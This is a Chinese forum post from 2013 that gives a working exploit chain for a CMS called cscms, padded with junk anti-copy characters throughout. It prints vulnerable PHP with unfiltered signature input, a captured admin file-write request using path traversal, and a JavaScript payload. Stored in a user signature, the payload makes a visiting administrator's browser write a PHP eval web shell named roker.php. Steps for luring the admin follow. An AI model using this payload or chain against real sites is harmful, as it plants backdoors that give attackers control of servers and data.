|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
3 o8 m0 {' F4 Y官网已经修补了,所以重新下了源码
' T* b' a0 p% u2 K/ u* Z, h4 Y8 |因为 后台登入 还需要认证码 所以 注入就没看了。
) h' k G7 |8 U/ {2 \; R2 w* N( t# N0 [存在 xss- ~3 V, M% X* N3 `9 H
漏洞文件 user/member/skin_edit.php. U0 D) R# C6 l
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:$ R }6 s4 C2 |$ h
* S& P" j# b/ k% C) f
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>1 t: `; n1 f$ t; O! |
& v: l/ _" ?: H) c; s( _</textarea></td></tr>2 I$ T8 T( F! N. V( f
; ]. y" ~, ^; A4 `5 H+ t" q user/do.php
8 h7 I9 b6 H8 z4 S1 B: @' G5 J. G9 z7 B5 `' |' p m; P+ H1 ^# C
$ l. @: [) Z" C% x
if($op=='zl'){ //资料/ f, ?. w4 r) U* o% |2 z
8 w! z B7 r8 |6 X9 k- ? if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) & A5 R3 I5 b2 i. x* m
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));$ D5 A" P% y. s; f8 n
9 }6 |# ?9 U7 c& P
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',$ B0 ]5 a6 y* s% o; ?' k
( V$ J: v. R& d8 r$ j
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
# c" v4 `: |1 R% j. G% i where CS_Name='".$cscms_name."'";. l) t* ^: g3 l7 r+ _ u9 k
. J! B, z( G. {. Z2 m& S if($db->query($sql)){5 B0 d4 r1 `9 }3 l% U
# t! ~- w2 {: }& C9 g* w: N3 ~
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
: e& b$ [$ Q# b6 Q
1 B% w4 P6 R+ X5 m; ]9 o }else{8 C' `9 ?' Z! A: ~) b1 ^
# O/ w! D" [$ A E7 f exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
+ k$ l; {8 H T- R7 ~ + M& L n: I- |6 Q& [, m) j5 |
}
5 d8 j" n4 x u- ^, s- ?/ ^. N$ }$ F! m) f+ k6 p% h
! i1 L. h* \' o7 g9 L
没有 过滤导致xss产生。) m& g: M. D- |* s0 n
后台 看了下 很奇葩的是可以写任意格式文件。。" i' e" v! `5 r
抓包。。2 m" n3 ?/ N- k/ U4 g
. J" h, T2 D7 h1 l& d
1 t& @; _! ?, T1 A3 J( x% S
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1, F( Q% Z5 ^/ k7 Y' b8 q4 |2 U$ v2 c
/ T) w& |9 A5 C- [4 q
Accept: text/html, application/xhtml+xml, */*( Q- d8 x: T- [% V
# j+ e+ |8 a @+ S5 S: RReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
! c/ t; r; P' I. F: k6 C) ]
! j8 J2 \4 T UAccept-Language: zh-CN# ]" D% y; c, E. B
( H% K7 Y+ V( I4 ]
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6 Q, x# b+ L5 A/ u 7 C t- ?2 p) z: ~/ o
Content-Type: application/x-www-form-urlencoded
2 I! j! a$ P3 w! j
: U$ w7 E/ L9 r6 _Accept-Encoding: gzip, deflate
9 K+ z1 `6 W; M4 I
' W: c* y* o) j6 V& U, tHost: 127.0.0.1! i' ?6 T5 T; @; X# ]; {
1 e+ L5 W: k! C. n/ x& }: t" KContent-Length: 38
" N, O+ V6 P$ m% v! T) j- [
3 r+ j# e% c* y4 P M/ P: ~5 BDNT: 1$ G' h! k. v: l
7 T* `, l. \, B0 nConnection: Keep-Alive' {* |2 ~& |0 p& ~5 s$ d9 ^3 e6 y$ N
) s% t1 B* J- N6 Z
Cache-Control: no-cache
5 p* Q& K r$ O8 d) A
5 H; G9 U T8 e* ^* w( NCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
; _4 t# @! t1 x2 _ C- Z. k
( Z) I3 H" x# F" }. j3 [
% H) y+ U2 A1 E5 x9 ~name=aaa.php&content=%3Cs%3E%3Ca%25%3E- |" u+ ?' s% ~. I; O
1 W( v5 V0 H1 t, d0 I. }& l" U- E" K/ m
( Z1 `6 I# l, O
于是 构造js如下。- J5 ^. c5 G9 o, Q, c0 T6 U! m/ E3 m
% ?, \# K8 h# B& D7 u' ]' V1 N6 [
本帖隐藏的内容<script> # G( @$ [" J# k
thisTHost = top.location.hostname;3 }7 |1 T) Q/ f/ \* ]( Y, }) D
" I# P+ J$ d7 }& nthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";6 X! f; h* x# I, V7 W$ _0 l: W& i
& \" c: D6 Q4 r, zfunction PostSubmit(url, data, msg) { 5 [& _" \- p0 \+ G
var postUrl = url;. ~8 e9 t% R# |0 v* G% e2 p% x
% A( s9 ]8 ^! S( z% g: w var postData = data;
4 W I. ], d' o1 m ]4 H o$ t6 O var msgData = msg; : F9 c# I9 l! }: J$ }% |# i7 }% I
var ExportForm = document.createElement("FORM");
! Q D3 p! ] \! V$ b' U; W; ] document.body.appendChild(ExportForm); 5 V8 }$ ]# E# K: \% h, _
ExportForm.method = "POST"; 4 m3 E) m5 d8 t6 R% @0 |$ o
var newElement = document.createElement("input"); & [0 ?+ t1 } A0 Z
newElement.setAttribute("name", "name");
/ L2 p4 F* m( l- V6 \: t newElement.setAttribute("type", "hidden"); % H" ]+ C$ d0 v, w6 ?# M' T& U
var newElement2 = document.createElement("input");
8 H) A6 }; \8 G' k+ l newElement2.setAttribute("name", "content");
4 Z9 q' ?0 K, b& \ newElement2.setAttribute("type", "hidden"); , a1 F& J4 k9 m7 L9 G" T1 i
ExportForm.appendChild(newElement); 9 y8 @9 z% s( L
ExportForm.appendChild(newElement2); 6 i" P6 G6 h) E3 e
newElement.value = postData; " X& m+ A- V: y5 E
newElement2.value = msgData; & @, T* s9 i" L1 K
ExportForm.action = postUrl;
! W) z7 A8 A* ^ ExportForm.submit(); ) a" N) Y: v1 v. p
};- B' B* v# w' C) _
6 ]& i9 F4 y$ F/ d
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");" i$ [( F' r' _; ]
! @( F0 Q- \3 T' O1 [
</script>8 {/ _$ r X, }) I" T9 ]9 z
' g4 ?: P c/ N/ q) k: |9 x0 T' |: N" H1 ^7 e; D$ ]
) p8 f+ ?) s5 J' I0 d
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入4 p! r5 s- E0 M F
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)3 g5 k. i1 v. A* F) L. b
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" K& ` Y0 d5 r( ~( r+ V* y |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对